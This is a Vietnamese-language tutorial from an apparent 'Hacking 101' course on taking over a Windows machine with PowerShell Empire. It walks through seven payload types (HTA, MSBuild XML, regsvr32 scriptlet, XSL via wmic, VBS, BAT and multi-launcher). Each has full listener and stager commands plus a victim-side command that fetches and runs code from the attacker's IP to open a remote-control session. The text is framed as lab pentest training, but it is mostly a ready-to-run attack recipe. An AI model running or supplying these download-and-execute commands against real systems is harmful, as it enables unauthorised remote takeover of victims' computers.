Những cách Khai thác Windows PC với PowerShell Empire

Nội Dung :

Đây là bài học thứ hai của chúng ta trong chuyên đề ‘PowerShell Empire ‘ của khóa học Hacking 101 @ https://cehvietnam.com

  • Exploit qua HTA
  • Exploit qua MSBuild.exe
  • Exploit qua regsvr32
  • XSL exploit
  • Exploit qua một visual basic script
  • BAT exploit
  • Multi_launcher exploit

Exploit qua HTA

Kiểu tấn công này giúp chúng ta khai thác hệ điều hành Windows trên máy tính nạn nhân thông qua .hta. Khi tệp .hta được chạy qua mshta.exe, nó thực thi dưới dạng tệp .exe có chức năng tương tự cho phép chúng ta vượt qua các cơ chế kiểm soát để điều khiển mục tiêu. Kiểu attack này được trình bày trong một bài học khác của Hacking 101 .

Khóa học Thao Trường Mạng

Chạy pentest lab gồm 1 Kali Linux và 1 Windows 2008 , kiểm tra IP Kali Linux hoặc gán địa chỉ 192.168.1.107 như bài hướng dẫn, và đặt IP thích hợp cho Windows Server để các máy có thể thấy nhau , nên kiểm tra qua lệnh Ping .

Hãy mở Empire với lệnh ‘./Empire’.

Trước tiên ta cần mở 1 listeners:


listeners

Thông báo sau sẽ xuất hiện khi mới chạy Empire “no listeners are currently active” , hãy kiểm tra IP trên máy của bạn sau đó thực hiện các lệnh như sau :

uselistener http
set Host http://192.168.1.107
execute

Khi listener http được tạo nhập lệnh ‘back’ để vào giao tiếp listener dùng cho việc tạo một exploit :

usestager windows/hta
set Listener http
set OutFile /root/1.hta
execute

Kết quả của lệnh trên là tập tin 1.hta được tạo ra. Các bạn hãy chạy máy chủ python với lệnh như trong hình minh họa nhằm mục đích chia sẽ tập tin hta trên:


python -m SimpleHTTPServer 8080

Khi máy chủ python hoạt động trên victim PC các bạn chạy lệnh sau để thực thi tập tin độc hại:

1mshta.exe http://192.168.1.107:8080/1.hta

Trong giây lát ta thấy xuất hiện một session như là XDGM6HLE , hãy truy cập với lệnh interact :


interact XDGM6HLE
sysinfo

Exploit thông qua MSBuild.exe

Tiếp theo ta sẽ dùng Empire để khai thác thông qua MSBuild.exe, điều này sẽ cho phép chúng ta điều khiển máy chủ windows từ xa thông qua tập tin XML. Để biết chi tiết kiểu tấn công này hãy xem tại đây (Hacking 101) . Hãy chạy các lệnh sau (lưu ý thay địa chỉ IP thích hợp) :

listeners
uselistener http
set Host http://192.168.1.107
execute

Hãy nhập lệnh ‘back’ để vào listener interface tạoexploit. Và chạy các lệnh sau đây :

usestager windows/launcher_xml
set Listener http
execute

Các bạn sẽ thấy tập tin xml là launcher.xml tạo trong thư mục /tmp. Hãy copy tập tin này máy victim PC trong mô hình lab (bên trong thư mục Microsoft.NET\Framework\v4.0.30319\) và chạy kết hợp các lệnh sau đây:

cd C:\Windows\Microsoft.NET\Framework\v4.0.30319\
MSBuild.exe launcher.xml

Nếu thành công sẽ thấy một session được thiết lập như trong hình là A8H14C7L , hãy tương tác với lệnh interact và thử lệnh sysinfo, help …


interact A8H14C7L
sysinfo

Exploit thông qua regsvr32

Phương án kế tiếp sẽ là tấn công thông qua regsvr32. Để biết chi tiết hãy xem trong khóa học Hacking 101. Lập lại quy trình với các lệnh như hai phần trên để tạo một listener và chạy exploit:

listeners
uselistener http
set Host http://192.168.1.107
execute

Gõ ‘back’ và tạo mã khai thác:

usestager windows/launcher_sct
set Listener http
execute

Tiến trình sẽ tạo tập tin .sct trong thư mục /tmp. Hãy chia sẽ tập tin với victim PC sử dụng pythong server và chạy lệnh sau từ cửa sổ Run của máy tính nạn nhân trong mô hình lab như hình minh họa

regsvr32.exe/u /n /s /i:http://192.168.1.107:8080/launcher.sct scrobj.dll

Nếu thành công ta sẽ có một session được thiết lập:

interact <session name>
sysinfo

Exploit qua XSL

XSL là một ngôn ngữ dùng cho việc định dạng dữ liệu, nó cũng mô tả cách máy chủ web tương tác với việc sử dụng XML. Phương pháp tấn công tiếp theo của chúng ta với Empire là khai thác tệp .xsl. Đối với phương pháp này, trước tiên hãy kích hoạt listener bằng cách nhập:

listeners
uselistener http
set Host http://192.168.1.107
execute

Tiếp theo tạo exploit :

usestager windows/launcher_xsl
set Listener http
execute

Ta thấy tập tin .xsl được tạo. Bây giờ hãy chạy máy chủ python server từ thư mục tập tin được tạo như hình sau :

cd /tmp
python -m SimpleHTTPServer 8080

Trên cửa sổ dòng lệnh của victim PC ta chạy lệnh :


wmic process get brief /format:”http://192.168.1.107:8080/launcher.xsl”

Nếu thành công ta sẽ có một session được thiết lập , hãy tương tác và thử các lệnh tùy ý :

interact <session name>
sysinfo

Exploit thông qua Visual Basic script

Tiếp theo, hãy chuyển qua thử nghiệm khai thác với một kịch bản VBS độc hại. Hãy tạo listener trước

listeners
uselistener http
set Host http://192.168.1.107
execute

Tạo tập tin kịch bản .vbs độc hại :

usestager windows/launcher_vbs
set Listener http
execute

Chạy máy chủ python :


python -m SimpleHTTPServer 8080

Một khi tập tin .vbs đã chia sẽ qua python server thì trên máy tính nạn nhân và thực thi ta chạy các lệnh điều khiển thích hợp (các bạn hãy mô tả lệnh chạy trên victim PC như là một đáp án) :

interact <session name>
sysinfo

Exploit qua tập tin bat

Như trong bài đầu tiên giới thiệu về Empire ta sẽ tạo 1 tập tin bat để tiến hành khai thác:

listeners
uselistener http
set Host http://192.168.1.107
execute
back

Tạo tập tin .bat :

usestager windows/launcher_bat
use Listener http
set OutFile /root/1.bat
execute

Các bạn thấy tập tin 1.bat được tạo, hãy chạy python server để chia sẽ tập tin 1.bat với victim PC.


python -m SimpleHTTPServer 8080

Và chạy tập tin 1/.bat (lệnh thế nào các bạn hãy trả lời nhé) và ta sẽ thấy 1 session được thiết lập:

interact <session name>
sysinfo

Multi_launcher

Cuối cùng là một vecto rta61n công có thể chạy trên nhiều nền tảng như Windows hay Linux , hãy tạo một listener:

listeners
uselistener http
set Host http://192.168.1.107
execute

Tạo một file nguy hiểm :

usestager multi/launcher
set listener http
execute

Các bạn sẽ thấy một đoạn code được tạo ra, thử copy đoạn code này và dán vào command prompt của victim PC rồi nhấn Enter ta sẽ chiếm được session điều khiển đến máy nạn nhân:

interact <session name>
sysinfo

Tổng Kết

Trên đây là các phương pháp mà bạn có thể sử dụng để khai thác hệ thống WIndows , hãy nắm vững và sử dụng nhuần nhuyễn Empire để bổ sung công lực pentest cho mình bên cạnh kho công cụ Metasploit thần thánh nghe các bạn. Happy Studing!

BQT AKADEMY – Hacking 101 Lab / Biên soạn từ H.A.I

Comments